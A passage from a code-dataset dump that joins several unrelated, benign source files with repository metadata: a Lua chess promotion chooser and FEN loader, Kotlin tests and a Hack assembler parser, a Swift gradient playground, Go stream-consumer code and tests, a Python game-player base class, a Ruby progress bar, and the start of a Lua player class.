    local mouseY = love.mouse.getY()
    love.mouse.setCursor()
    -- Dim the whole board behind the chooser.
    love.graphics.setColor(0.1, 0.1, 0.1, 0.7)
    love.graphics.rectangle("fill", 0, 0, 960, 960)
    -- Draws one 2x2-tile option at board cell (gridX, gridY) with the
    -- current hover shadow, handles hover/click, and returns the updated
    -- shadow value.  Factored out of four nearly identical 30-line copies.
    local function drawOption(pieceType, gridX, gridY, shadow)
        local piece = bit.bor(pieceType, col)
        local x = gridX * squareTileWidth
        local y = gridY * squareTileHeight
        love.graphics.setColor(((241 + 168) / 2) / 255 + shadow / 50, ((217 + 122) / 2) / 255 + shadow / 50,
            ((192 + 101) / 2) / 255 + shadow / 100, 1)
        love.graphics.rectangle("fill", x, y, squareTileWidth * 2, squareTileHeight * 2, 50, 50)
        -- Drop shadow of the piece, offset by the hover amount.
        love.graphics.setColor(0, 0, 0, 0.7)
        love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(piece),
            x + squareTileWidth / 4 - shadow, y + squareTileHeight / 4 + shadow, 0, 1.5, 1.5)
        -- The piece itself.
        love.graphics.setColor(1, 1, 1, 1)
        love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(piece),
            x + squareTileWidth / 4, y + squareTileHeight / 4, 0, 1.5, 1.5)
        -- Rounded outline.
        love.graphics.setColor(0, 0, 0, 1)
        love.graphics.setLineWidth(5)
        love.graphics.rectangle("line", x, y, squareTileWidth * 2, squareTileHeight * 2, 50, 50)
        if CheckMouseCollision(mouseX, mouseY, x, y, squareTileWidth * 2, squareTileHeight * 2) then
            shadow = math.min(shadow + 1, 10)
            love.mouse.setCursor((love.mouse.getSystemCursor("hand")))
            if love.mouse.isDown(1) then
                love.mouse.setCursor()
                Piece().Promote(piece)
                shadow = 0
            end
        else
            shadow = math.max(shadow - 1, 0)
        end
        return shadow
    end
    queenShadow = drawOption(Piece().Queen, 1, 2, queenShadow)
    rookShadow = drawOption(Piece().Rook, 5, 2, rookShadow)
    bishopShadow = drawOption(Piece().Bishop, 1, 5, bishopShadow)
    knightShadow = drawOption(Piece().Knight, 5, 5, knightShadow)
    love.graphics.setLineWidth(1)
end
-- Reset the board to the position described by the startFen global.
function Board:LoadStartPosition()
    Board:LoadPosition(startFen)
end
-- Load a FEN position into the *global* game state (Game.Board / Game),
-- rebuilding the per-colour piece lists, the king squares, the side to
-- move, the four castling rights and the en-passant file.
-- NOTE(review): loadedPosition and piece are globals here (no `local`);
-- presumably unintentional, but preserved.
function Board:LoadPosition(fen)
    loadedPosition = PositionFromFen(fen)
    Game.Board.LightPieces = {}
    Game.Board.DarkPieces = {}
    -- Cache Piece() accessors outside the 64-iteration loop.
    local pec = Piece()
    local isCLR = pec.IsColor
    local pTYPE = pec.PieceType
    for squareIndex = 1, 64 do
        piece = loadedPosition.squares[squareIndex]
        -- Square = {piece code, visible flag, <third flag cleared>}.
        Game.Board.Square[squareIndex][1] = piece
        Game.Board.Square[squareIndex][2] = true
        Game.Board.Square[squareIndex][3] = false
        if piece ~= 0 then
            if isCLR(piece, pec.White) then
                table.insert(Game.Board.LightPieces, squareIndex)
                if pTYPE(piece) == pec.King then
                    Game.Board.kingSquare['w'] = squareIndex
                end
            else
                table.insert(Game.Board.DarkPieces, squareIndex)
                if pTYPE(piece) == pec.King then
                    Game.Board.kingSquare['b'] = squareIndex
                end
            end
        end
    end
    Game.turn = loadedPosition.turn
    Game.wkcstl = loadedPosition.whiteCastleKingside
    Game.wqcstl = loadedPosition.whiteCastleQueenside
    Game.bkcstl = loadedPosition.blackCastleKingside
    Game.bqcstl = loadedPosition.blackCastleQueenside
    Game.epFile = loadedPosition.epFile
end
-- True when the point (x, y) lies strictly inside the axis-aligned
-- rectangle whose top-left corner is (x2, y2) with the given size.
-- Points exactly on an edge are treated as outside, as before.
function CheckMouseCollision(x, y, x2, y2, width, height)
    local insideX = x > x2 and x < x2 + width
    local insideY = y > y2 and y < y2 + height
    return insideX and insideY
end
| 43.682171 | 120 | 0.607986 | 3.375 |
bbdb03c3f539663a7877265fcd39ede110c4a621 | 1,141 | kt | Kotlin | main/src/test/kotlin/de/richargh/sandbox/spock/strongtypes/PersonTest.kt | Richargh/spock-strong-types-krdl-kt-sandbox | 5e4307dc43eda04f61de83c141267f9a7eb8fe54 | [
"MIT"
] | null | null | null | main/src/test/kotlin/de/richargh/sandbox/spock/strongtypes/PersonTest.kt | Richargh/spock-strong-types-krdl-kt-sandbox | 5e4307dc43eda04f61de83c141267f9a7eb8fe54 | [
"MIT"
] | null | null | null | main/src/test/kotlin/de/richargh/sandbox/spock/strongtypes/PersonTest.kt | Richargh/spock-strong-types-krdl-kt-sandbox | 5e4307dc43eda04f61de83c141267f9a7eb8fe54 | [
"MIT"
] | null | null | null | package de.richargh.sandbox.spock.strongtypes
import org.assertj.core.api.Assertions.assertThat
import org.assertj.core.api.Assertions.catchThrowable
import org.junit.jupiter.params.ParameterizedTest
import org.junit.jupiter.params.provider.CsvSource
import org.junit.jupiter.params.provider.ValueSource
internal class PersonTest {
@ParameterizedTest
@CsvSource(value = [
"John, 5, Reporter",
"Lisa, 2, Astronaut"])
fun `a persons age can never be less than 0`(
name: Name, age: Age, job: Job) {
// arrange
val testling = person {
withName(name)
withAge(age)
withJob(job)
}
// act
val thrown = catchThrowable { testling.changeAge(Age(-1)) }
// assert
assertThat(thrown).isInstanceOf(IllegalArgumentException::class.java)
}
@ParameterizedTest
@ValueSource(strings = [
"John",
"Lisa"])
fun `all names are allowed`(
@ConvertNameToPerson testling: Person) {
// arrange
// act
// assert
assertThat(testling.name).isNotNull
}
} | 25.931818 | 77 | 0.624014 | 3.03125 |
4ac3050ee1afc7cc157d450e529e2b9b151e51c2 | 2,092 | swift | Swift | playgrounds/ChangingGradientView.playground/Contents.swift | Changzw/every-case-demo | 0ba08146fee2904bd2151fcea8041f03b8b86e71 | [
"Apache-2.0"
] | null | null | null | playgrounds/ChangingGradientView.playground/Contents.swift | Changzw/every-case-demo | 0ba08146fee2904bd2151fcea8041f03b8b86e71 | [
"Apache-2.0"
] | null | null | null | playgrounds/ChangingGradientView.playground/Contents.swift | Changzw/every-case-demo | 0ba08146fee2904bd2151fcea8041f03b8b86e71 | [
"Apache-2.0"
] | null | null | null | //: A UIKit based Playground for presenting user interface
import UIKit
import PlaygroundSupport
extension UIColor {
convenience init(AHEX string: String) {
var hex = string.hasPrefix("#")
? String(string.dropFirst())
: string
guard hex.count == 8 || hex.count == 6
else {
self.init(white: 1.0, alpha: 1)
return
}
if hex.count == 6 {
hex = "FF" + hex
}
guard let intCode = Int(hex, radix: 16) else {
self.init(white: 1.0, alpha: 1)
return
}
let divisor: CGFloat = 255
let alpha = CGFloat((intCode >> 24) & 0xFF) / divisor
let red = CGFloat((intCode >> 16) & 0xFF) / divisor
let green = CGFloat((intCode >> 8 ) & 0xFF) / divisor
let blue = CGFloat((intCode ) & 0xFF) / divisor
self.init(red: red, green: green, blue: blue, alpha: alpha)
}
}
class MyViewController : UIViewController {
  var timer: DispatchSourceTimer?
  let gradientLayer = CAGradientLayer()

  /// A random opaque colour expressed as a 6-digit hex string accepted by
  /// `UIColor(AHEX:)`.  The original interpolated
  /// `String(Int.random(in: 0...255), radix: 16)`, which yields only 1-2
  /// hex digits; that fails `AHEX`'s length check, so every colour
  /// silently fell back to white.
  private func randomColor() -> UIColor {
    UIColor(AHEX: String(format: "#%06X", Int.random(in: 0...0xFFFFFF)))
  }

  override func loadView() {
    super.loadView()
    let view = UIView()
    // Horizontal gradient seeded with two random colours.
    gradientLayer.startPoint = .zero
    gradientLayer.endPoint = CGPoint(x: 1, y: 0)
    gradientLayer.colors = [randomColor(), randomColor()].map(\.cgColor)
    self.view = view
    // Re-randomise the gradient once per second on the main queue.
    timer = DispatchSource.makeTimerSource(flags: .strict, queue: DispatchQueue.main)
    timer?.setEventHandler { [weak self] in
      guard let self = self else { return }
      self.gradientLayer.colors = [self.randomColor(), self.randomColor()].map(\.cgColor)
    }
    timer?.schedule(deadline: .now() + .seconds(1), repeating: .seconds(1))
    timer?.activate()
  }
  override func viewDidLoad() {
    super.viewDidLoad()
    view.layer.addSublayer(gradientLayer)
  }
}
// Present the view controller in the Live View window
PlaygroundPage.current.liveView = MyViewController()
| 31.69697 | 109 | 0.611377 | 3.375 |
c3ace8ba54a76ce1d4317369067e467e8db166ed | 1,154 | go | Go | cmd/output.go | mickep76/grpc-exec-example | fd6794a634bdbb6b5f12e173017729bdeb3ba2b8 | [
"Apache-2.0"
] | 3 | 2018-07-07T16:52:43.000Z | 2018-10-15T14:00:00.000Z | cmd/output.go | mickep76/grpc-exec-example | fd6794a634bdbb6b5f12e173017729bdeb3ba2b8 | [
"Apache-2.0"
] | null | null | null | cmd/output.go | mickep76/grpc-exec-example | fd6794a634bdbb6b5f12e173017729bdeb3ba2b8 | [
"Apache-2.0"
] | null | null | null | package cmd
import (
"bufio"
"bytes"
"io"
"time"
)
type Reader struct {
reader io.Reader
BytesRead int
}
func newReader(r io.Reader) *Reader {
return &Reader{reader: r}
}
func (r *Reader) Read(p []byte) (n int, err error) {
n, err = r.reader.Read(p)
r.BytesRead += n
return n, err
}
// Message is one line of captured command output.
type Message struct {
  Received time.Time // timestamp taken when the line was scanned
  Line int // per-writer 0-based line counter
  Stderr bool // true when emitted by the stderr-tagged Writer
  Message string // the line text (newline stripped by the scanner)
}
// Writer is an io.Writer that converts written bytes into line Messages
// on a channel.  NewWriter builds a stdout/stderr pair sharing one channel.
type Writer struct {
  line int // next line number to assign
  stderr bool // tag applied to every Message from this writer
  ch chan Message // shared destination channel
}
// NewWriter builds a linked pair of writers that share one buffered
// Message channel: the first tags its lines as stdout, the second as stderr.
func NewWriter() (*Writer, *Writer) {
  shared := make(chan Message, 1024)
  stdout := &Writer{ch: shared}
  stderr := &Writer{stderr: true, ch: shared}
  return stdout, stderr
}
// Chan exposes the shared message channel to consumers, receive-only.
func (w *Writer) Chan() <-chan Message {
  return w.ch
}
// Write scans p line by line and emits one timestamped Message per line
// on the shared channel, numbering lines per writer.  It reports the
// number of bytes consumed from p.
//
// NOTE(review): a chunk that ends mid-line is still emitted as a complete
// line, so callers that split a line across Write calls will see it as
// two separate messages.
func (w *Writer) Write(p []byte) (int, error) {
  reader := newReader(bytes.NewReader(p))
  scanner := bufio.NewScanner(reader)
  for scanner.Scan() {
    w.ch <- Message{
      Received: time.Now(),
      Line: w.line,
      Stderr: w.stderr,
      Message: scanner.Text(),
    }
    w.line++
  }
  // bufio.Scanner's Err is documented to return nil (never io.EOF) at end
  // of input, so the original io.EOF comparison was dead and is dropped.
  if err := scanner.Err(); err != nil {
    return reader.BytesRead, err
  }
  return reader.BytesRead, nil
}
// Close closes the shared channel.  Because both writers of a NewWriter
// pair share one channel, close only one of them, and only after all
// writes have finished (a send or second close would panic).
func (w *Writer) Close() error {
  close(w.ch)
  return nil
}
| 16.724638 | 87 | 0.633449 | 3.078125 |
653275e0a6bf64ffd7bef701a34270c76bd37631 | 1,854 | py | Python | clisk/player/player.py | etano/clisk | 70067eb98568a97d896ee486bae56b49c77bcb11 | [
"MIT"
] | null | null | null | clisk/player/player.py | etano/clisk | 70067eb98568a97d896ee486bae56b49c77bcb11 | [
"MIT"
] | null | null | null | clisk/player/player.py | etano/clisk | 70067eb98568a97d896ee486bae56b49c77bcb11 | [
"MIT"
] | null | null | null | class Player(object):
"""Player class
Attributes:
name (str): Player name
"""
def __init__(self, name):
"""Initialize player
Args:
name (str): Player name
"""
self.name = name
def place_troops(self, board, n_troops):
"""Place troops on territories
Args:
board (Gameboard): The gameboard
n_troops (int): Number of new troops to deploy
Returns:
(dict(str, int)): Dictionary of territories with number of troops to be deployed
"""
raise NotImplementedError('place_troops not implemented')
def do_attack(self, board):
"""Decide whether or not to continue attacking
Args:
board (Gameboard): The gameboard
Returns:
(bool): Whether or not to continue attacking
"""
raise NotImplementedError('do_attack not implemented')
def attack(self, board):
"""Attack phase
Args:
board (Gameboard): The gameboard
Returns:
(str, str): from_territory, to_territory
"""
raise NotImplementedError('attack not implemented')
def do_move_troops(self, board):
"""Decide whether or not to move troops
Args:
board (Gameboard): The gameboard
Returns:
(bool): Whether or not to move troops
"""
raise NotImplementedError('do_move_troops not implemented')
def move_troops(self, board):
"""Troop movement phase
Args:
board (Gameboard): The gameboard
Returns:
(str, str, int): from_territory, to_territory, n_troops
"""
raise NotImplementedError('move_troops not implemented')
| 26.112676 | 95 | 0.553937 | 3.375 |
43a5562a14702b4fc51c7509a5011fd3afd8d942 | 9,708 | go | Go | delivery/consumer_test.go | openrelayxyz/cardinal-streams | 74f712e2933ab8ce06f965ff1fafa4011a06b115 | [
"MIT"
] | 1 | 2022-02-21T12:23:20.000Z | 2022-02-21T12:23:20.000Z | delivery/consumer_test.go | openrelayxyz/cardinal-streams | 74f712e2933ab8ce06f965ff1fafa4011a06b115 | [
"MIT"
] | null | null | null | delivery/consumer_test.go | openrelayxyz/cardinal-streams | 74f712e2933ab8ce06f965ff1fafa4011a06b115 | [
"MIT"
] | 1 | 2022-03-28T20:50:54.000Z | 2022-03-28T20:50:54.000Z | package delivery
import (
"time"
"testing"
"math/big"
"math/rand"
"github.com/openrelayxyz/cardinal-types"
// "strings"
"regexp"
"runtime"
)
// testResumptionMessage wraps a delivery Message with the offset/source
// bookkeeping the consumer expects from a resumable stream.
type testResumptionMessage struct{
  Message
  offset int64
  source string
}

// Offset, Source and Time satisfy the ResumptionMessage interface.
func (r *testResumptionMessage) Offset() int64 { return r.offset }
func (r *testResumptionMessage) Source() string { return r.source }
func (r *testResumptionMessage) Time() time.Time { return time.Now() }
// toTestResumptionMessage flattens per-source message maps into a single
// slice of ResumptionMessages, assigning each source an independent,
// monotonically increasing offset (mimicking per-partition offsets).
func toTestResumptionMessage(inputs... map[string][]Message) []ResumptionMessage {
  offsets := make(map[string]int64)
  result := []ResumptionMessage{}
  for _, input := range inputs {
    for k, msgs := range input {
      for _, msg := range msgs {
        result = append(result, &testResumptionMessage{Message: msg, offset: offsets[k], source: k})
        offsets[k]++
      }
    }
  }
  return result
}
// TestConsumer drives a producer/processor pair end to end: the block's
// own messages must not complete a batch while the "state/" part is still
// outstanding, and the follow-up SendBatch must release exactly one
// PendingBatch with the expected merged values and deletes.
func TestConsumer(t *testing.T) {
  p, err := NewProducer(
    "default",
    map[string]string{
      "foo/": "foo",
      "bar/[^/]+/baz/": "bar",
      "state/thing": "state",
    },
  )
  if err != nil { t.Errorf(err.Error()) }
  mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
  msgs, err := p.AddBlock(
    0,
    types.HexToHash("01"),
    types.HexToHash("00"),
    new(big.Int),
    map[string][]byte{
      "foo/something": []byte("gnihtemos/oof"),
      "bar/whatever/baz/stuff": []byte("data"),
      "default/thing": []byte("defaulttopic"),
    },
    map[string]struct{}{
      "foo/delete": struct{}{},
      "bar/delete/baz/thing": struct{}{},
      "default/delete": struct{}{},
    },
    map[string]types.Hash{
      "state/": types.HexToHash("ff"),
    },
  )
  if err != nil { t.Fatalf(err.Error()) }
  ch := make(chan *PendingBatch, 5)
  sub := mp.Subscribe(ch)
  defer sub.Unsubscribe()
  msgList := toTestResumptionMessage(msgs)
  for _, msg := range msgList {
    if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
  }
  runtime.Gosched()
  // The "state/" batch referenced by the block has not arrived yet, so
  // nothing may be emitted.
  select {
  case v := <-ch:
    t.Errorf("Expected nothing on channel yet, got %v, %v, %v", v.pendingBatches, v.prefixes, v.batches)
  default:
  }
  // Deliver the outstanding state batch; this should complete the block.
  msgs, err = p.SendBatch(types.HexToHash("ff"), []string{"whatever/", "other/"}, map[string][]byte{"state/thing": []byte("thing!")})
  if err != nil { t.Fatalf(err.Error()) }
  msgList = toTestResumptionMessage(msgs)
  for _, msg := range msgList {
    if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
  }
  runtime.Gosched()
  select {
  case v := <-ch:
    if v.Number != 0 { t.Errorf("Unexpected batch number") }
    if v.Weight.Cmp(new(big.Int)) != 0 { t.Errorf("Unexpected weight") }
    if v.ParentHash != types.HexToHash("00") { t.Errorf("Unexpected hash" ) }
    if l := len(v.Values); l != 4 { t.Errorf("Unexpected updates length; Expected 4, got %v", l)} // 2 prefixes, 1 batch, 2 changes not in schema
    if l := len(v.Deletes); l != 5 { t.Errorf("Unexpected deletes length; Expected 5, got %v", v.Deletes)} // 2 prefixes, 1 batch, 2 changes not in schema
  default:
    t.Errorf("Expected item on channel, nothing yet")
  }
  // Exactly one batch: the channel must now be drained.
  select {
  case v := <-ch:
    t.Errorf("Unexpected item on channel: %v", v)
  default:
  }
}
// getTestMessages produces the full message stream (block plus its state
// batch) for blockCount sequential blocks, each the child of the
// previous, and flattens everything into resumption messages.
func getTestMessages(t *testing.T, blockCount int) []ResumptionMessage {
  p, err := NewProducer(
    "default",
    map[string]string{
      "foo/": "foo",
      "bar/[^/]+/baz/": "bar",
      "state/thing": "state",
    },
  )
  if err != nil { t.Errorf(err.Error()) }
  msgs := []map[string][]Message{}
  for i := 1; i <= blockCount ; i++ {
    // Hash i links to parent hash i-1; batch ids live in the 0xff00 range
    // to avoid colliding with block hashes.
    blockHash := types.BytesToHash([]byte{byte(i)})
    parentHash := types.BytesToHash([]byte{byte(i-1)})
    batchid := types.BytesToHash([]byte{255, byte(i-1)})
    m, err := p.AddBlock(
      int64(i),
      blockHash,
      parentHash,
      new(big.Int),
      map[string][]byte{
        "foo/something": []byte("gnihtemos/oof"),
        "bar/whatever/baz/stuff": []byte("data"),
        "default/thing": []byte("defaulttopic"),
      },
      map[string]struct{}{
        "foo/delete": struct{}{},
        "bar/delete/baz/thing": struct{}{},
        "default/delete": struct{}{},
      },
      map[string]types.Hash{
        "state/": batchid,
      },
    )
    if err != nil { t.Fatalf(err.Error()) }
    msgs = append(msgs, m)
    m, err = p.SendBatch(batchid, []string{"whatever/", "other/"}, map[string][]byte{"state/thing": []byte("thing!")})
    if err != nil { t.Fatalf(err.Error()) }
    msgs = append(msgs, m)
  }
  return toTestResumptionMessage(msgs...)
}
// TestShuffled feeds one block's messages in random order and verifies
// the processor still assembles exactly one complete PendingBatch.
func TestShuffled(t *testing.T) {
  mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
  ch := make(chan *PendingBatch, 5)
  sub := mp.Subscribe(ch)
  defer sub.Unsubscribe()
  msgList := getTestMessages(t, 1)
  rand.Seed(time.Now().UnixNano())
  rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
  for _, msg := range msgList[:] {
    // t.Error(err) rather than t.Errorf(err.Error()): feeding an error's
    // text to a format string breaks whenever it contains '%' verbs
    // (flagged by go vet's printf check).
    if err := mp.ProcessMessage(msg); err != nil { t.Error(err) }
  }
  runtime.Gosched()
  select {
  case v := <-ch:
    if v.Number != 1 { t.Errorf("Unexpected batch number") }
    if v.Weight.Cmp(new(big.Int)) != 0 { t.Errorf("Unexpected weight") }
    if v.ParentHash != types.HexToHash("00") { t.Errorf("Unexpected hash" ) }
    if l := len(v.Values); l != 4 { t.Errorf("Unexpected updates length; Expected 4, got %v", l)} // 2 prefixes, 1 batch, 2 changes not in schema
    if l := len(v.Deletes); l != 5 { t.Errorf("Unexpected deletes length; Expected 5, got %v", v.Deletes)} // 2 prefixes, 1 batch, 2 changes not in schema
  default:
    t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
  }
  select {
  case v := <-ch:
    t.Errorf("Unexpected item on channel: %v", v)
  default:
  }
}
// TestShuffledDups replays a random quarter of one block's messages as
// duplicates, in random order; the processor must de-duplicate and emit
// the completed batch exactly once.
func TestShuffledDups(t *testing.T) {
  mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
  ch := make(chan *PendingBatch, 5)
  sub := mp.Subscribe(ch)
  defer sub.Unsubscribe()
  msgList := getTestMessages(t, 1)
  rand.Seed(time.Now().UnixNano())
  rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
  // Duplicate the first quarter of the (already shuffled) stream, then
  // shuffle again so duplicates land anywhere.
  msgList = append(msgList, msgList[:len(msgList) / 4]...)
  rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
  for _, msg := range msgList[:] {
    if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
  }
  runtime.Gosched()
  select {
  case v := <-ch:
    if v.Number != 1 { t.Errorf("Unexpected batch number") }
    if v.Weight.Cmp(new(big.Int)) != 0 { t.Errorf("Unexpected weight") }
    if v.ParentHash != types.HexToHash("00") { t.Errorf("Unexpected hash" ) }
    if l := len(v.Values); l != 4 { t.Errorf("Unexpected updates length; Expected 4, got %v", l)} // 2 prefixes, 1 batch, 2 changes not in schema
    if l := len(v.Deletes); l != 5 { t.Errorf("Unexpected deletes length; Expected 5, got %v", v.Deletes)} // 2 prefixes, 1 batch, 2 changes not in schema
  default:
    t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
  }
  select {
  case v := <-ch:
    t.Errorf("Unexpected item on channel: %v", v)
  default:
  }
}
// TestShuffledDupsMultiBlock runs the shuffled-duplicates scenario over
// two chained blocks and expects exactly two completed batches, no more.
func TestShuffledDupsMultiBlock(t *testing.T) {
  mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
  ch := make(chan *PendingBatch, 5)
  sub := mp.Subscribe(ch)
  defer sub.Unsubscribe()
  msgList := getTestMessages(t, 2)
  rand.Seed(time.Now().UnixNano())
  rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
  msgList = append(msgList, msgList[:len(msgList) / 4]...)
  rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
  for _, msg := range msgList[:] {
    if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
  }
  runtime.Gosched()
  // One receive per expected block, then the channel must be empty.
  select {
  case <-ch:
  default:
    t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
  }
  select {
  case <-ch:
  default:
    t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
  }
  select {
  case v := <-ch:
    t.Errorf("Unexpected item on channel: %v", v)
  default:
  }
}
// TestConsumerReorg checks that Reorg/ReorgDone control messages are
// accepted without error after a block has been processed.
func TestConsumerReorg(t *testing.T) {
  p, err := NewProducer(
    "default",
    map[string]string{
      "foo/": "foo",
      "bar/[^/]+/baz/": "bar",
      "state/thing": "state",
    },
  )
  if err != nil { t.Errorf(err.Error()) }
  mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
  msgs, err := p.AddBlock(
    0,
    types.HexToHash("01"),
    types.HexToHash("00"),
    new(big.Int),
    map[string][]byte{
      "foo/something": []byte("gnihtemos/oof"),
      "bar/whatever/baz/stuff": []byte("data"),
      "default/thing": []byte("defaulttopic"),
    },
    map[string]struct{}{
      "foo/delete": struct{}{},
      "bar/delete/baz/thing": struct{}{},
      "default/delete": struct{}{},
    },
    map[string]types.Hash{
      "state/": types.HexToHash("ff"),
    },
  )
  for _, msg := range toTestResumptionMessage(msgs) {
    if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
  }
  // Offsets 19/20 continue past the block's messages on a dedicated
  // "reorg" source.
  if err := mp.ProcessMessage(&testResumptionMessage{Message: p.Reorg(0, types.HexToHash("00")), offset: 19, source: "reorg"}); err != nil {
    t.Errorf(err.Error())
  }
  if err := mp.ProcessMessage(&testResumptionMessage{Message: p.ReorgDone(0, types.HexToHash("00")), offset: 20, source: "reorg"}); err != nil {
    t.Errorf(err.Error())
  }
}
| 34.063158 | 154 | 0.607437 | 3 |
8eaac5799c4b40a970d0a2fa06742d97d7284f0e | 2,078 | rb | Ruby | lib/rmega/progress.rb | personal-social-media/rmega | 007041cb4d568f430cd8e385d86da1d20a86ac42 | [
"MIT"
] | 130 | 2015-01-28T22:32:43.000Z | 2022-03-26T17:40:32.000Z | lib/rmega/progress.rb | personal-social-media/rmega | 007041cb4d568f430cd8e385d86da1d20a86ac42 | [
"MIT"
] | 30 | 2015-07-06T14:02:36.000Z | 2022-01-18T07:29:51.000Z | lib/rmega/progress.rb | personal-social-media/rmega | 007041cb4d568f430cd8e385d86da1d20a86ac42 | [
"MIT"
] | 29 | 2015-02-15T09:56:57.000Z | 2022-03-13T22:03:26.000Z | module Rmega
class Progress
include Options
def initialize(total, options = {})
@total = total
@caption = options[:caption]
@bytes = 0
@real_bytes = 0
@mutex = Mutex.new
@start_time = Time.now
if show? and options[:filename]
puts options[:filename]
end
show
end
def show?
options.show_progress
end
def show
return unless show?
message = @caption ? "[#{@caption}] " : ""
message << "#{humanize_bytes(@bytes)} of #{humanize_bytes(@total)}"
if ended?
message << ". Completed in #{elapsed_time} sec.\n"
else
message << ", #{percentage}% @ #{humanize_bytes(speed, 1)}/s, #{options.thread_pool_size} threads"
end
print_r(message)
end
def stty_size_columns
return @stty_size_columns unless @stty_size_columns.nil?
@stty_size_columns ||= (`stty size`.split[1].to_i rescue false)
end
def columns
stty_size_columns || 80
end
def print_r(message)
if message.size + 10 > columns
puts message
else
blank_line = ' ' * (message.size + 10)
print "\r#{blank_line}\r#{message}"
end
end
def percentage
(100.0 * @bytes / @total).round(2)
end
def speed
@real_bytes.to_f / (Time.now - @start_time).to_f
end
def elapsed_time
(Time.now - @start_time).round(2)
end
def ended?
@total == @bytes
end
def increment(bytes, options = {})
@mutex.synchronize do
@caption = options[:caption] if options[:caption]
@bytes += bytes
@real_bytes += bytes unless options[:real] == false
show
end
end
def humanize_bytes(*args)
self.class.humanize_bytes(*args)
end
def self.humanize_bytes(bytes, round = 2)
units = ['bytes', 'kb', 'MB', 'GB', 'TB', 'PB']
e = (bytes == 0 ? 0 : Math.log(bytes)) / Math.log(1024)
value = bytes.to_f / (1024 ** e.floor)
return "#{value.round(round)} #{units[e]}"
end
end
end
| 21.873684 | 106 | 0.567372 | 3.25 |
f314715c9e3ac2b5283ead4b783012cbce9d8dd4 | 1,932 | kt | Kotlin | src/main/assembler/Parser.kt | Corithm/toy-computer | f682a1b5f0127c1f656bd22b7b49047f47570209 | [
"Apache-2.0"
] | null | null | null | src/main/assembler/Parser.kt | Corithm/toy-computer | f682a1b5f0127c1f656bd22b7b49047f47570209 | [
"Apache-2.0"
] | null | null | null | src/main/assembler/Parser.kt | Corithm/toy-computer | f682a1b5f0127c1f656bd22b7b49047f47570209 | [
"Apache-2.0"
] | null | null | null | package main.assembler
import java.io.BufferedReader
import java.io.FileReader
/**
* Parser implementation.
*
* p. 113 - 114
*/
class Parser(fileName: String)
{
    // Buffered line reader over the given assembly source file.
    private val reader: BufferedReader = BufferedReader(FileReader(fileName))
    // Most recently read (space-trimmed) line; null before the first
    // nextLine() call and after end of file.
    private var currentCommand: String? = null
    // Command-type codes returned by commandType().
    val IGNORED: Int = 0
    val A_COMMAND: Int = 1
    val C_COMMAND: Int = 2
    val L_COMMAND: Int = 3
/**
* Sets the next command.
*/
fun nextLine(): Boolean
{
currentCommand = reader.readLine()
if (currentCommand != null)
{
currentCommand = currentCommand!!.trim(' ')
}
return currentCommand != null
}
/** @return the command type */
fun commandType(): Int
{
if (currentCommand!!.length >= 2 && currentCommand!![0] == '/'&& currentCommand!![1] == '/')
{
return IGNORED
}
else if (currentCommand!!.length > 0)
{
return when (currentCommand!![0]) {
'@' -> A_COMMAND
'(' -> L_COMMAND
else -> C_COMMAND
}
}
return IGNORED
}
    /** Releases the underlying file reader. */ fun close() { reader.close() }
    /**
     * @return the symbol or decimal of A_COMMAND or L_COMMAND: strips the
     * leading '@' or '(' and everything from a closing ')' onwards.
     */
    fun symbolMnemonic() = currentCommand!!.substring(1).substringBefore(')')
/** @return the dest part of the code */
fun destMnemonic(): String
{
if (currentCommand!!.contains('='))
return currentCommand!!.substringBefore('=')
else
return "null"
}
    /**
     * @return the comp part of the code (between '=' and ';').
     * Note: substringAfter('=') returns the whole command when there is
     * no '=', so dest-less commands like "D;JGT" still yield "D".
     */
    fun compMnemonic() = currentCommand!!.substringAfter('=').substringBefore(';')
/** @return the jump part of the code */
fun jumpMnemonic(): String {
if (currentCommand!!.contains(';'))
{
return currentCommand!!.substringAfter(';')
}
else return "null"
}
} | 23.851852 | 100 | 0.549172 | 3.234375 |
15c75b19508b0bf233e22734ecdab13f50ed18f0 | 2,683 | lua | Lua | Player.lua | Kraton9000/Ninja_Run | a745bbca0359f8325c5026d2babe55f640bd8a67 | [
"Adobe-2006",
"Adobe-Glyph"
] | null | null | null | Player.lua | Kraton9000/Ninja_Run | a745bbca0359f8325c5026d2babe55f640bd8a67 | [
"Adobe-2006",
"Adobe-Glyph"
] | null | null | null | Player.lua | Kraton9000/Ninja_Run | a745bbca0359f8325c5026d2babe55f640bd8a67 | [
"Adobe-2006",
"Adobe-Glyph"
] | null | null | null | require "30log-global"
Player = class("Player")
-- Construct a player at (x, y) showing frame 1 of the given stance's
-- sprite sheet; the collision box is derived from the loaded sprite.
function Player:init(character, stance, stanceLimit, x, y, spriteSpeed, spriteTimer)
    self.character = character
    self.stance = stance
    self.stanceLimit = stanceLimit
    self.stanceCount = 1
    self.x = x
    self.y = y
